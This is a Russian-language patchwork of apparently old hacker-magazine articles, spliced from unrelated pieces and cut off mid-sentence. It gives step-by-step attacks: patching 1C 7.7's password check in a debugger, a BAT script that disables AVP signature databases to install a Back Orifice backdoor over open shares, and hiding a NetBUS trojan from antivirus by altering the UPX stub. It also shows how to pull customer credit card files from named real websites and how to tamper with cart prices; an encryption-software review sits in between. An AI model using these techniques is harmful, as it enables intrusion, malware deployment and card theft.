конецформыначалоформыМой опыт 1С-ника показывает, что злоумышленники в основном пытаются ломать файл users.usr. Он находится по адресу: каталог_с_базой\usrdef \users.usr и хранит информацию о пользователях и их паролях. Пароли хранятся в виде хэшей: MD5(pass), поэтому просмотреть пароль просто так не выйдет. Существуют брутфорсеры MD5 (именно для 1С), а также есть возможность скинуть пароли всех пользователей. Однако сброс всех паролей мгновенно вызовет подозрение админов или бухгалтеров. Я протестировал такой брутфорсер и пришел к выводу, что числовые пароли взламываются очень быстро, но достаточно подключить символы и ограничить длину 8-10 символами — и уже становится невесело, так как дело попахивает долгими часами перебора. Ты скажешь: «Да бухгалтеры для пароля всегда свой год рождения пишут!» В чем-то правильно, но… Последние тенденции в корпорациях и даже мелком бизнесе показывают стремление защитить информацию (данные о клиентах, поставщиках, оборотах предприятия) от кражи и от глаз весьма заинтересованных конкурентов. В борьбе за сохранность данных создаются службы безопасности, вводятся административные меры наказания, минимальные требования к длине пароля и т.п. К примеру, в фирме, где работал я, мы сами задавали пароли и ставили вот такие условия:
Длина = восемь символов
Цифры + буквы + одна заглавная в английской раскладке.
[для промежуточного вывода] могу сказать, что атака на users.usr имеет несколько недостатков:
1 ПОДБОР ПАРОЛЯ ПЕРЕБОРОМ НЕ ВСЕГДА ОСУЩЕСТВИМ В КОРОТКИЕ СРОКИ, ОСОБЕННО ЕСЛИ ОСТАЛОСЬ РАБОТАТЬ ДВЕ НЕДЕЛИ 
.
2 ВРЯД ЛИ ПОЛУЧИТСЯ УДАЛИТЬ ФАЙЛ. ЛЮБОЙ НОРМАЛЬНЫЙ АДМИН ПОСТАВИТ НА ЭТОТ ФАЙЛ АТРИБУТ READONLY (ТОЛЬКО ДЛЯ ЧТЕНИЯ). И ЕСТЕСТВЕННО, ПОДМЕНИТЬ ХЭШ-СУММУ ТОЖЕ НЕ ПОЛУЧИТСЯ.
Ну что ж, придется поступить хитрым образом. Учитывая свой опыт реверсера, я решил поковыряться в 1CV7s.exe (25-й релиз). Как выяснилось, не зря. Буква S в конце имени файла указывает на SQL-версию, локальную и сетевую. Мой выбор пал именно на нее, одну из самых распространенных, неслучайно: она превосходно работает на Терминале, поддерживает как DBF, так и SQL-базы, освобождает от головной боли насчет электронных ключей (кто видел голубые экраны при установке эмуляторов хаспов, тот поймет).
[перейдем к практике] Представим ситуацию, когда есть база данных по сотрудникам, помимо личных данных в ней хранится информация по кредитным картам. Конечно, мы не допущены к справочнику доступа, и, соответственно, нет доступа к документам на перевод/начисление денежных средств. Пора получить его. Первое, что приходит в голову, — убрать проверку пароля и входить под любым пользователем.
Запускаем отладчик (я использовал OllyDbg), в списке выбираем нужную базу и пытаемся авторизоваться как «Админ» (рис. 1). Получаем сообщение об ошибке (рис. 2.).
Пойдем по классической схеме, ставим брэйкпоинт на MessageBoxA (с учетом регистра): BP MessageBoxA.
Теперь на кнопку ОК, и мы вывалились в:
77D2BC33 > 833D E>CMP [DWORD DS:77D5F2E4],0
77D2BC3A 0F85 F>JNZ USER32.77D3C23E
Это системная библиотека USER32.dll, а защита находится в коде самой программы (долго прыгать по библиотекам сейчас не время, так как лишние мучения в 1С’ке, многослойном пироге с кучей используемых библиотек, ни к чему). Мои исследования привели к библиотеке: UserDef.dll. Имя Dll совпадает с названием каталога, в котором хранятся пароли пользователей. Вполне логично, что разработчики вынесли авторизацию пользователей именно в нее. Итак,
260296AB E8 C4B>CALL
260296B0 68 2CF>PUSH USERDEF.2604F62C
260296B5 8BCF MOV ECX,EDI
Поднимемся чуть выше:
26029691 50 PUSH EAX ; хэш от настоящего пароля
26029692 51 PUSH ECX ; хэш от пароля, введенного нами
26029693 FF15 2>CALL [DWORD DS:<&MSVCRT._mbscmp>] ; msvcrt._mbscmp ; эта процедура сравнивает две строки и возвращает в регистре EAX ноль, если строки равны, и -1, если строки различаются
26029699 83C4 0>ADD ESP,8
2602969C 85C0 TEST EAX,EAX
2602969E 5D POP EBP
2602969F 5B POP EBX
260296A0 74 23 JE SHORT USERDEF.260296C5 ; если строки равны, продолжаем работу
Итак, мы можем внести изменения в работу этого участка и заставить 1С думать, что ты вводишь пароль. Один из рецептов — передать в процедуру сравнения указатели на одну и ту же строку:
26029691 50 PUSH EAX ; хэш от настоящего пароля
26029692 50 PUSH EAX ; хэш от настоящего пароля
26029693 FF15 2>CALL [DWORD DS:<&MSVCRT._mbscmp>]
Теперь функция всегда будет возвращать верное значение и мы сможем зайти под любым пользователем. После замены 1С запустит тебя в базу без нареканий. Однако, например, в моей фирме для каждого пользователя заведен специальный каталог, и если пользователь с таким же именем сидит в базе, то мы увидим табличку с рисунка 3.
[использование личных каталогов] — достаточно распространенное явление. Значит, мы должны убрать текущую проверку. Действуем по указанной выше схеме (бряк на MessageBoxA и несколько раз на
00409075 . E8 6C>CALL
0040907A . 8A45 >MOV AL,[BYTE SS:EBP-61]
0040907D . 84C0 TEST AL,AL
0040907F . 74 13 JE SHORT 1CV7s.00409094 ; если каталог не занят, прыгаем
00409081 . 6A FF PUSH -1
00409083 . 6A 10 PUSH 10
00409085 . 68 6C>PUSH 706C
0040908A . E8 2D>CALL
0040908F . E9 84>JMP 1CV7s.0040AF18
Естественно, поменяв переход, мы пропускаем проверку и оказываемся в базе.
Теперь можно вытворять в базе что угодно, если, конечно, права пользователя позволяют.
[в этой статье] я рассмотрел версию 1С 7.7. Почему не восьмерку? Во-первых, 7.7 до сих пор очень распространена, 95% моих знакомых пользуются именно ей. Во-вторых, восьмерка не менее дырявая, чем 7.7. К такому выводу я пришел посмотрев на подход 1С к безопасности продуктов. Чуть позже проверим еще раз. Администраторам же советую использовать терминал с отключенным маппингом дисков или, при работе в обычном сетевом режиме, запускать 1С с правами другого пользователя (тогда не получится пропатчить чужой процесс), а на исполняемые файлы 1С однозначно ставить атрибут ReadOnly. Только не на всю папку, иначе она примется падать при запуске.
Цель данной статьи – показать способ взлома вашего компьютера. Автор не несет никакой ответственности за ущерб, который может быть следствием прочтения этого сообщения.
Данный метод работает только на Windows 9x русских версиях (для английских версий необходимо подправить каталог автозапуска), а также при инсталляции Antiviral Toolkit Pro в c:\program files\antiviral toolkit pro\ (по умолчанию).
Рассмотрим следующую ситуацию: есть хост, имеющий общий ресурс С с полным доступом, установленным Antiviral Toolkit Pro. Как положить на него backdoor? Для этого надо заархивировать с паролем (BackdooR) сервер бакдора (будем использовать Back Oriffice 2000). Пароль используется для того, чтобы AVP сканер не смог обнаружить сервер бакдора:
>PKZIP.EXE -a -sBackooR asyslg.dll BO2K.EXE
Теперь AVP не сможет увидеть сигнатуры BO2k в ASYSLG.DLL (если установлена опция проверки архивов).
Затем необходимо обеспечить запуск сервера и обезвредить AVP. Для этого напишем BAT-файл:
@echo off
attrib -R c:\progra~1\antivi~1\backdoor.avc >nul
attrib -R c:\progra~1\antivi~1\trojan.avc >nul
del c:\progra~1\antivi~1\backdoor.avc >nul
del c:\progra~1\antivi~1\trojan.avc >nul
copy c:\progra~1\antivi~1\macro.avc c:\progra~1\antivi~1\backdoor.avc >nul
copy c:\progra~1\antivi~1\mail.avc c:\progra~1\antivi~1\trojan.avc >nul
c:\windows\pkunzip.exe -e -sBackdooR c:\windows\ASYSLG.DLL
C:\Windows\ГЛАВНО~1\ПРОГРА~1\АВТОЗА~1\ >nul
del c:\windows\pkunzip.exe >nul
del c:\windows\asyslg.dll >nul
del c:\winstart.bat >nul
echo on
Расшифровка построчно:
отключение вывода на экран выполняемых команд
снятие атрибута READONLY с файла backdoor.avc (база сигнатур для бакдоров)
снятие атрибута READONLY с файла tojan.avc (база сигнатур для троянов)
удаление файла backdoor.avc
удаление файла tojan.avc
подмена базы (для того, чтобы при запуске сканера AVP не ругался)
подмена базы (отсутствие базы)
разархивация бакдора и помещение его автозагрузку
удаление PKUNZIP
удаление архива с бакдором
удаление файлы запуска
Почему это будет работать? Потому что при старте Windows если в главном каталоге находится файл WINSTART.BAT он запускается на выполнение. При этом пользователь не увидит ни одного сообщения. Затем необходимо скопировать на удаленный компьютер следующие файлы:
ASYSLG.DLL в директорию c:\windows\
PKUNZIP.EXE в директорию c:\windows\
WINSTART.BAT в директорию c:\
Итого необходимо будет закачать 86.508 байт.
Все. После перезагрузки на компьютере из автозагрузки запустится сервер, удалит себя оттуда и запишет себя в c:\windows\system\ (сервер должен быть сконфигурирован на удаление оригинального файла). В принципе, можно использовать архиватор CAB, и проводить распаковывание программой EXTRACT.EXE, которая присутствуют на почти всех компьютерах, что позволит уменьшить размер перекачиваемых данных, однако данный архиватор не позволяет архивировать с паролем, что может привести к обнаружению сервера бакдора сканером (если включена опция проверки архивов).
Рекомендации по защите от данного вида атаки:
1. Закройте все общие ресурсы! Если вы без них жить не можете установите на них пароль (не менее 6 символов и не менее 1 спецсимвола).
2. Поставьте себе Firewall. Даже если эта атака пройдет успешной, получить доступ к вашей системе не удастся – Firewall вас сразу же предупредит о попытке проникновения. Я рекомендую Tiny Personal Firewall.
3. При обнаружении и внезапной пропажи каких-то файлов сразу проверяйте свои диски антивирусом, а также проводите профилактическое сканирование дисков не менее одного раза в неделю.
4. Своевременно обновляйте антивирусные базы.
ZaDNiCa
anonym01@mailru.com
Модифицируем троян или как обойти AVP #2
Прочитав повествование об обмане AVP при посылке трояна на удаленный компьютер я был сказочно обрадован полетом народной мысли Но разве можно заниматься таким вредительством, как удаление баз с вирусными сигнатурами – это сакс (не по-кулхацкерски), к тому же каждый дурак любит постоянно обновлять базы – благо на халяву и автоматом 
Теперь и я хочу поделиться кое-каким методом. Задача стара как мир – не занимаясь написанием своего трояна, надо сделать имеющийся незаметным для антивируса. Итак, нам понадобятся:
1) PE компрессор UPX (http://upx.tsx.org/)
2) Шестнадцатеричный редактор Hiew (http://protools.cjb.net/)
3) ProcDump32 как редактор PE (http://protools.cjb.net/)
4) Минимальные познания в ассемблере
5) Собственно троян. Я взял старый NetBUS (уж что нашлось)
6) Правильно установленный девайс “руки”
Так как же антивирус ищет вирусы и трояны? Какое-то время назад я пообщался с очень умными людьми, которые сообщили мне, что это “Страшная Тайна”, и официальной информации я по этому поводу не найду. Но если в вкратце, то антивирус, не обнаружив в файле известных сигнатур (последовательностей байт), применяет “эвристику” – начинает смотреть, что за команды идут в файле, и пытается их эмулировать и “смотреть”, что же эти команды могут делать, поскольку не может просто запустить файл, дождаться, пока он сам распакуется/расшифруется в память, дабы случайно не заразить комп, на котором запускается этот файл. Однако многие команды (например, настройку импорта) процессора он не может проэмулировать, поэтому, встретив такие команды, он просто забивает на дальнейшую проверку, даже не говоря о своей некомпетентности
К счастью (или нет), все пакеры для оптимизации пишутся настолько через задницу, что антивирус приходит в дикий восторг, т.е. бросает проверку файла, что нам и надо. Тем не менее, у AVP есть набор функций, с помощью которых он может определить, чем запакован файл, и распаковать его по имеющейся схеме, что он и делает в частности для UPX, и обнаруживает трояна в запакованном файле. Основная идея заключается в том, что нам надо изменить распаковщик таким образом, чтобы антивирус не признал в файле известный ему пакер и пропустил проверку. Итак, займемся делом.
Берем файл patch.ex_ из архива original.zip (я его специально так назвал, чтобы ни у кого не было соблазна запустить его, а потом обвинять меня в распространении троянов). Я этот файл уже пожал UPX. Файл определяется AVP как Backdoor.NetBUS.170. Если используете другой троян, то пакуем его с помощью UPX. AVP все равно определяет трояна, но говорит, что файл пожат UPX. Хех, я это и так знаю…Теперь натравливаем на пожатый файл PE Editor из ProcDump32. Нам надо посмотреть адрес точки входа в файл (Entry Point) и адрес загрузки (Image Base). Имеем:
Entry Point: 00082460h
Image Base: 00400000h
Теперь открываем файл в Hex редакторе Hiew. Переходим в режим дизассемблера (F4/Decode). Отправляемся по адресу Entry Point + Image Base = 00482460h (у кого плохо с шестнадцатеричной математикой, может воспользоваться стандартным мастдайским калькулятором – там есть Hex режим). Для этого жмем Goto (F5) и набиваем в качестве адреса “.482460″ (точка перед адресом нужна потому что это виртуальный адрес). Видим начало распаковщика – что то вроде этого:
.00482460: 60 pushad
.00482461: BE00304500 mov esi,000453000 ;” E0 ”
.00482466: 8DBE00E0FAFF lea edi,[esi][0FFFAE000]
.0048246C: C787B0C405001C340F90 mov d,[edi][00005C4B0],0900F341
.00482476: 57 push edi
.00482477: 83CDFF or ebp,-001 ;” ”
.0048247A: EB0E jmps .00048248A
То, что надо. Теперь надо найти свободное место для патча. Пролистаем страниц 6 вниз, и видим немного места забитого нулями – это добрый дядя Билли придумал выравнивание секций. Вот это и нужно было нам. Я выбрал адрес 004825CFh. Теперь подводим курсор к этому адресу и начинаем редактировать файл в ассемблерном режиме (F3/F2). Заколачиваем всего две команды: push OEP и ret (не забывая жать enter после ввода каждой команды Где ОЕР это Entry Point + Image Base, т.е. в нашем случае это число 00482460 – для других файлов соответственно будет другое. Итого забили вот что:
Push 00482460
Ret
Сохраняем изменения (F9) и теперь файло выглядит примерно так:
.004825A9: 8903 mov [ebx],eax
.004825AB: 83C304 add ebx,004 ;” ”
.004825AE: EBE1 jmps .000482591
.004825B0: FF9698380800 call d,[esi][000083898]
.004825B6: 61 popad
.004825B7: E9B87CFDFF jmp .00045A274
.004825BC: D425 aam 025
.004825BE: 48 dec eax
.004825BF: 00E0 add al,ah
.004825C1: 254800B0D4 and eax,0D4B00048 ;”+_ H”
.004825C6: 45 inc ebp
.004825C7: 0000 add [eax],al <-- Это было забито нулями
.004825C9: 0000 add [eax],al
.004825CB: 0000 add [eax],al
.004825CD: 0000 add [eax],al
.004825CF: 6860244800 push 000482460 ;" H$`" <-- Это наша вставка
.004825D4: C3 retn
.004825D5: 0000 add [eax],al <-- Опять нули
.004825D7: 0000 add [eax],al
Остался последний рывок. Снова открываем файл в PE Editor'е от ProcDump32 и меняем точку входа на адрес нашей вставки, не забыв от виртуально адреса отнять Image Base, т.е. в Entry Point пишем 000825CF (Offset - Image Base = 004825CF - 00400000 = 000825CF). Кто знаком с ассемблером, тот поймет, что было сделано, а кто не знает (sic!) - тому это не нужно Вся операция занимает 2-3 минуты и литр пива.
Проверьте полученный файл (лежит в patched.zip) антивирусом. Мой AVP (как сканер, так и монитор) ничего не заметили, даже не сказали что, файл пожат. Вот такой он "народный", "самый лучший" антивирус. Кстати, Dr.Web тоже отсосал и все такое.
Полученный файл прекрасно работает у меня на WinME, как будет он себя вести на Win2k или НТ - Х.З. Я не проверял, но причин для отказа в работе я не вижу. Если у кого-то не получится так сделать - мылить мне не нужно, а надо переустановить драйвера устройства "руки".
Принцип современной криптозащиты заключается не в создании шифровки, которую невозможно прочесть (такое практически невозможно), а в повышении затрат криптоанализа. То есть зная сам алгоритм шифрования, но не знаю ключа, взломщик должен потратить миллионы лет на расшифровку. Ну или столько, сколько понадобится (как известно информация перестаёт быть важной после смерти ваших близких и вас самих), пока x-files не потеряют актуальность. При этом сложность вступает в противоречии с лёгкостью использования: данные должны шифроваться и расшифровываться достаточно быстро при использовании ключа. Программы, которые попали в сегодняшний обзор, в целом удовлетворяют двум названным критериям: они достаточно просты в эксплуатации, при этом используют в меру стойкие алгоритмы.
DriveCrypt
Начнём мы с проги, которая сама по себе достойна отдельной статьи или цикла статей. Уже при установке я был удивлён дополнительной возможностью создания ложной операционной системы. Сразу же после завершения общения с мастером установки ДрайвКрипт предложил создать хранилище ключей. Хранилищем может быть выбран любой файл: файл, рисунок, мп3. После того как путь к хранилищу указан, вбиваем пароли, коих у нас целых два типа: master & user. Отличаются они доступом к настройкам DCPP – пользователь не имеет возможности что-то изменить, он может лишь просматривать заданные настройки. Каждый тип может состоять из двух и боле паролей. Собственно доступ к установке защиты может быть представлен как по паролю мастера, так и по паролю пользователя.
Перед тем, как шифровать любые диски, нужно проверить корректность установки защиты загрузки. Будьте внимательны, если не проверить корректность работы защиты загрузки и сразу же зашифровать диск, то восстановить его содержимое будет невозможно. После проверки можно переходить к шифрованию диска или раздела. Чтобы зашифровать диск или раздел, следует выбрать Disk Drives и нажать Encrypt. Мастер шифрования диска откроет окно, в котором будет предложено выбрать ключ из хранилища. Диск будет зашифрован этим ключом и этот же ключ потребуется для дальнейшей работы с диском. После того, как ключ выбран, будет запущен процесс шифровки диска. Процесс достаточно долгий: в зависимости от объема шифруемого диска или раздела он может занимать до нескольких часов.
В общем всё это достаточно просто и стандартно. Гораздо интереснее поработать с ложной осью. Отформатируем раздал на жёстком диске обязательно в FAT32 (похоже, слухи о смерти этой файловой системы оказались сильно преувеличены ), поставим Windows, установим DriveCrypt. Создаваемая ложная операционная система должна выглядеть как рабочая, постоянно используемая. После того, как скрытая операционная система будет создана, загружаться и работать с ложной ОС крайне опасно, поскольку есть вероятность разрушить данные скрытой операционной системы. Накидав в систему всякий мусор, создаём новое хранилище, авторизуемся в DCPP, переключаемся на вкладку Drives, выделяем раздел, где установлена ложная операционная система и фтыкаем HiddenOS. Откроется окно настроек. Здесь всё просто: указываем путь к только что созданному хранилищу, пароли, метку скрытого диска, его файловую систему и количество свободного места, которое будет отделять ложную операционную систему от скрытой. После фтыкания кнопки Create Hidden OS будет запущен процесс создания скрытого раздела и всё содержимое системного раздела будет скопировано на скрытый раздел. Прога создаст скрытый раздел, начало которого будет находиться через указанный при создании скрытого раздела промежуток свободного места от окончания ложного раздела. Перезагружаемся и авторизуемся вводом паролей, которые были указаны при создании скрытого раздела. Содержимое ложной операционной системы не будет видно при работе в скрытой ОС, и наоборот: при работе в ложной операционной системе не будет видно скрытой ОС. Таким образом, только введённый пароль при включении компьютера определяет то, какая операционная система будет загружена. После окончания создания скрытой операционной системы в неё нужно войти и зашифровать системный раздел.
При помощи DriveCrypt можно зашифровать любой жесткий диск или сменный накопитель (за исключением CD и DVD) и использовать его для обмена данными между пользователями. Несомненным плюсом обмена данными на полностью зашифрованном носителе является невозможность обнаружения на нём каких-либо файлов, носитель выглядит не отформатированным. Даже располагая информацией о том, что носитель зашифрован, при отсутствии ключа данные прочитать будет невозможно.
DriveCrypt шифрует целый диск или раздел, позволяя скрыть не только важные данные, но и всё содержимое диска или раздела, включая операционную систему. К сожалению, за такой уровень безопасности приходится расплачиваться значительным падением производительности файловой системы.
Files Cipher
Здесь мы встречаем довольно оригинальный алгоритм шифрования с закрытым ключом длиной от 4 до 255 символов, разработанный самими авторами проги. Причем, пароль-ключ не хранится внутри зашифрованного файла, что уменьшает возможность его взлома. Принцип работы программы прост: указываем файлы или папки, которые необходимо зашифровать, после чего прога предлагает ввести ключ. Для большей надежности ключик можно подбирать не только на клавиатуре, но и с помощью специальной панели. Эта панель, походу дела, была нагла украдена у MS Word (вставка – символ). Подтвердив ввод пароля, мы вынудим программу зашифровывать файл, присвоив ему расширение *.shr.
Files Cipher способен сжимать шифруемые файлы с помощью встроенного алгоритма архивации. К тому же после шифрования исходный файл может удаляться с жесткого диска без возможности восстановления. Программа работает с файлами любых типов, а также поддерживает файлы размером более 4 Gb (для NTFS). При этом системные требования к компьютеру очень скромные и ресурсов в отличии от фронтмена кушается всего ничего.
PGP Personal Desktop
В PGP реализовано шифрование как открытыми, так и зарекомендовавшими себя симметричными ключами: AES с шифрованием до 256-битного, CAST, TripleDES, IDEA и Twofish2. Для управления ключами шифрования имеется опция PGP Keys, которая выводит окошко с отображением пользовательских ключей и добавленных в список открытых ключей. Схема работы модуля для шифрования дисков PGP Disk… мммм… как бы это сказать? А, элементарна. Опять таки создаём файл Хранилище Ключей (я его про себя называю Ключником), вводим пароли. Причем при указании пароля отображается специальный индикатор стойкости (качества), который, кстати, наглядно демонстрирует актуальность сложных паролей: так, стойкость пароля, состоящего из восьми цифр, примерно равна стойкости шестибуквенного или четырехзначного, в котором есть один спецсимвол (восклицательный знак) и три буквы.
Очень понравилось, что создатели подумали и об ICQ (кто читал логи Сталкера после дефейса мазафаки, тот поймёт… или они не в аси были и я что-то путаю?). После установки в окошке аськи появляется специальная иконка, с помощью которой и включается защита сессий.
Что касается самой больной темы – утечки информации через своп-файл – авторы сами признали, что наглухо перекрыть этот канал утечки они не смогли ввиду особенностей функционирования операционной системы. С другой стороны, предприняты меры по уменьшению данной угрозы – все важные данные хранятся в памяти не дольше, чем это необходимо. После завершения операции вся критически важная информация из памяти удаляется. Таким образом, эта уязвимость имеет место, и для ее ликвидации нужно либо отключить виртуальную память (что может привести к заметному ухудшению работы ОС), либо предпринять дополнительные меры по защите.
конецформыначалоформыПрограмма применяет стойкие и проверенные временем алгоритмы шифрования, способна архивировать файлы, и полностью их уничтожать – файлы удаляются, и их место на диске многократно перезаписывается по специальному алгоритму, чтобы исключить возможность восстановления данных. В общем то направлена DigiSecret именно на создание закодированных архивов и передача этих архивов между пользователями. Интерфейс программы, по сути, напоминает различные архиваторы: для создания архива нужно перетащить нужные файлы в основное окно программы и, выбрав соответствующий пункт меню, создать закодированный архив. Производитель утверждает, что используемый в DigiSecret механизм компрессии чрезвычайно эффективен, однако на практике оказывается, что даже встроенный в Windows XP механизм компрессии ZIP справляется с этой задачей лучше. Впрочем, не это главная задача программы, и ее уровень достаточен для среднего пользователя. При создании архива можно выбрать одну из девяти степеней сжатия в соответствии с желаемой скоростью архивации, или отключить компрессию совсем, и тогда программа просто зашифрует содержимое файлов. DigiSecret умеет создавать и SFX архивы, что наверняка пригодится в тех случаях, когда возникает необходимость передать информацию человеку, не имеющему своей копии этой программы. В созданном архиве сохраняется структура папок, хотя в основном окне программы все файлы «свалены в кучу».
Программа предлагает на выбор несколько алгоритмов кодирования — CAST (128-битный ключ), Blowfish (448-битный ключ), Twofish (256-битный ключ) и Rijndael (также известен как AES, 256-битный ключ). На вопрос о лучшем выборе алгоритма сама компания однозначно ответить не может: по мнению авторов программы, все предложенные варианты хороши. Алгоритм CAST-128 устойчив к линейному и дифференциальному криптоанализу, и может быть взломан только методом полного перебора. Twofish и Blowfish являются устойчивыми и быстрыми шифрами, об уязвимости которых ничего не известно. Rijndael является победителем конкурса на AES (Advanced Encryption Standard) и в 2000 году стал стандартом в США. Если предположить, что эти алгоритмы могут быть взломаны только методом полного перебора, то ключи длиной 128 бит смогут противостоять атакам в течение многих десятилетий, а ключи длиной 448 бит исключают даже теоретическую возможность атаки. Одним словом, компания оставляет выбор наиболее понравившегося варианта за пользователем. Программа не использует мастер-ключ, расшифровка возможна только ключом, использованным при шифровании. Следует отметить, что размер создаваемого архивного файла остается неизменным независимо от выбранного алгоритма кодирования.
DigiSecret предлагает пользователям на выбор два варианта безопасной передачи информации: другим пользователям DigiSecret с помощью встроенных в программу средств или по электронной почте в виде кодированного файла. Для передачи файлов средствами программы необходимо поместить нужные объекты в основное окно и выбрать в меню «Команды» пункт «Отправить через DigiSecret». Открывшееся после этого окно настроек передачи позволяет выбрать нужного адресата, указав его IP-адрес, а также алгоритм кодирования и пароль. Для удобства выбора часто используемых адресатов в программе предусмотрена простая адресная книга.
При использовании для передачи информации электронной почты программа создает кодированный архив (предлагая предварительно выбрать его настройки) и открывает почтовый клиент с новым письмом и вложенным в него архивом. Пользователю остается только выбрать нужного адресата и при необходимости дописать сообщение. Кстати, о сообщениях. Программа имеет встроенный Центр кодирования сообщений, позволяющий зашифровать текстовое сообщение с помощью одного из алгоритмов и передать его по электронной почте. Для его расшифровки адресат, разумеется, должен знать пароль.
Возможности программы конечно хороши: она позволяет использовать алгоритмы шифрования AES, Blowfish,CAST5,Serpent, 3DES, Twofish и каскадированое кодирование AES-Twofish, AES-Twofish-Serpent, Serpent-AES, Serpent-Twofish-AES, Twofish-Serpent. Для хеширования используется алгоритмы Whirlpool,SHA-1,RIPEMD-160. Имеется возможность использования стеганографического кодирования – скрытых шифрованных дисков, а так же формирование шифрованных разделов устройств – дисковых разделов или флэш карт. Алгоритм установки и настройки как всегда аскетичен и мудр как Дхарма монах – при запуске программы вызывается мастер, который помогает вам создать Ключника, его тип – простой или скрытый, в любом случае вы можете указать размер, метод шифрования и хеширования. В качестве паролей можно устанавливать как простой пароль, так и ключевой фай, при чем этот файл может быть сгенерирован программой. Очень привлекает режим шифрования разделов диска – здесь работа производится без первоначальной прослойки файловой системы, что ускоряет доступ к данным.
Присоединение зашифрованного тома выполняется легко. В зависимости от того, что используется в качестве засекреченного тома, файл-контейнер или раздел жесткого диска (флэшка и т.д.), жмем на кнопку Select File или Select Device. При монтировании тома можно указать параметры подключения (только для чтения, как media-устройство для предотвращения создания Windows на томе папок Recycle Bin и System Volume Information), отключения (время простаивания, реакции на различные события) и др.
На первый взгляд программа не отличается от себе подобных. Ну разве что списком поддерживаемых операционок: UNIX (OSF/1, LINUX, BSD, SunOS, HP/UX, AIX и т.д.), Novell, Windows 3.хх/9х/NT/2000/XP и т.д. Да вот зашифрованная информация храниться в файлах-контейнерах, которые можно копировать, перемещать в другую директорию, на другой компьютер или диск. Имеется функция настройки автоматического закрытия контейнера – все виртуальные диски автоматически закрываются либо по истечению времени, если нет пользовательской активности, либо по нажатию специальной комбинации «горячих» клавиш на клавиатуре. Центр управления BestCrypt позволяет группировать контейнеры в соответствии с требованиями пользователей. Порядок группировки контейнеров индивидуален для каждого пользователя. Это добавляет еще один уровень безопасности в ситуациях, когда компьютеры одновременно используются несколькими пользователями, которым требуется работа со своими собственными контейнерами. Мы можем назначать контейнеру дополнительный пароль, который вправе использовать, чтобы дать другому пользователю временный доступ к своей информации. Это необходимо для того, чтобы потом не менять основной пароль контейнера – достаточно запретить дополнительный пароль. Функция защиты контейнеров Container Guard Utility предотвращает случайное либо неавторизованное удаление файлов контейнеров – требует ввода пароля контейнера.
Надежное удаление информации обеспечивается утилитой BCWipe Utility. Ее использование служит гарантией от неавторизованного восстановления удаленной информации с обычных дисков. Эта утилита позволяет как удаление конкретного файла, так и надежную чистку всего свободного места на указанном диске. Утилита Swap File Encryption Utility позволяет криптографически защищать файл подкачки Windows. Swap File Encryption позволяет шифровать содержимое файла подкачки и предотвратить возможную атаку злоумышленника. Пользователь может создать другой, скрытый контейнер внутри уже существующего контейнера-оболочки. Контейнер-оболочка и скрытый контейнер защищаются разными паролями и невозможно определить, есть ли в контейнере скрытая часть. В зависимости от введенного пароля откроется либо основной, либо скрытый контейнер. Контейнер можно спрятать, замаскировав под видео, аудио файл или рисунок простой сменой расширения файла (с jbc на avi, mp3 или jpg). В контейнерах может храниться как достаточно статичная информация – документы, архивы, так и динамическая – базы данных (в т.ч. семейства программ 1С, банковских программ и т.д.).
Разбираем дальше уязвимости систем электронной коммерции. Начнем со сладкого, а именно с сс. Незадачливым администраторам интернет-магазинов уже давно следовало бы понять, что файлам, хранящим критическую информацию (пароли, номера кредитных карт, и т.д.), совсем не место в открытых для всеобщего просмотра веб-директориях, даже если об этих файлах никто, кроме самого админа не знает. Примером такого головотяпства, является —www.swimmingcoach.org , администратор которого хранит данные о кредитных карточках своих клиентов в текстовых файлах директории /_private/, будучи уверенным в том, что о их существовании знает только он один. Так бы и было, если бы не всеми любимый Microsoft, со своим
величайшим творением всех времен и народов – FrontPage, который сыграл в этом случае злую шутку. Ее смысл в том, что в некоторых файлах FrontPage хранит информацию о всех файлах веб-сервера и, что самое главное, файлах, в которые выводятся и сохраняются результаты обработки данных. О дним из таких файлов является writeto.cnf, расположенный как правило в — http://www.xxx.org/_vti_pvt/writeto.cnf.
Вот какую информацию предоставляет скачанный writeto.cnf с сервера
www.swimmingcoach.org (именно скачанный, в браузере ты его не откроешь):
—–
_private/sic7result.txt: collegesTiJimming/sicS.htm fpdb:global.asa
collegesTiJimming/sicS.asp salary.asp
_private/Jobsvc_net.txt:jobservice/job_net_questions.htm
_private/audio_sales.txt:worldclinic/ASCA99/asca99_audio.htm
_private/survey.txt:jobservice/salary.htm _private/Mc2000_registration. txt:
Tijorldclinic/asca2000/asca2000_packets . htm
_private/form_results.txt:jobservice/02salary.htm
_private/article_results.txt:ALTST/past_articles/altst_4.htm ALTST/past_artide;
pbsurvey.txt:water_depth_rule_questionnaire.asp
_private/cert_up.txt:forms/certupgrade.htm
_private/Mcreg2002_results.txt:worldclinic/ASCA2002/registration2.htm worldclin:
_private/emembers.txt:articles/9903/9903-4.htm articles/9903/9903-5.htm
article;j _private/jobsvc_net.txt:jobservice/job_net_questions.htm
_private/certificaion_orders.txt:ASCA_Catalog/certification_0rder.htm
_private/ameridome_leads.txt:ameridome/ordering.htm
_private/feedbackl.txt:forms/feedback.htm
_private/bkcatalog.txt:ASCA_Catalog/catalog.htm ASCA_Catalog/images/catalog.htm
_private/wc2000_Registration.txt: worldclinic/ ASCA2000/asca2000_packets.htm
_private/sicSresult.txt:sicS/default.htm
_private/sescc_reg.txt:forms/STiJscc_reg.htm
_private/chevron.txt:forms/chevform.htm
_private/sicord.txt:ASCA_Catalog/sicord.htm
_private/samonth.txt:forms/samonth.htm
_private/altst_jоin.txt:ALTST/ALTST_Join.htm learning_center:global.asa
SurvivalKIT:survivalkit.asp
—–
Как ты видишь, результаты выводятся в текстовые файлы emembers.txt, survey.txt,
sicSresult.txt лежащие в директории /_private/. Остается всего лишь открыть их в
браузере и сохранить те, в которых лежат кредитки.
Кроме этого, ту же информацию можно получить и из другого файла на этом сервере
author.log, расположенного в директории /_vti_log/. Он большой, так что придется
запастись терпением.
Следующим сайтом который подвергнется нашему разбору, будет www.maledicta.com.
В одной из прошлых статей мы говорили о манипуляции ценой в торговых тележках.
www.maledicta.com дает нам еще один пример такого действия. Скрипт тележки
quikstore.cgi (в прошлом – бажный) в данном случае обрабатывает запросы методом
POST, так что для изменения цены товара придется воспользоваться утилитой
Achilles, скачать которую ты можешь с нашего сайта – lwb57.webmen.ru.
С ее помощью ты увидишь строку запроса вот такого вида:
—–
item-BEQUGODU%7C14.95%7CEquinox+of+the+Gods%7CNA%7CNA=1&store_type=html&page=c[+]
[+]rowley.html&add_to_cart.x=45&add_to_cart.y=14
—–
Конечно, если выберешь книгу Алистера Кроули (Сrowley), на мой взгляд,
единственного мистика, достойного прочтения.
Как ты, наверное, уже успел заметить, что цена товара передается в строке запроса
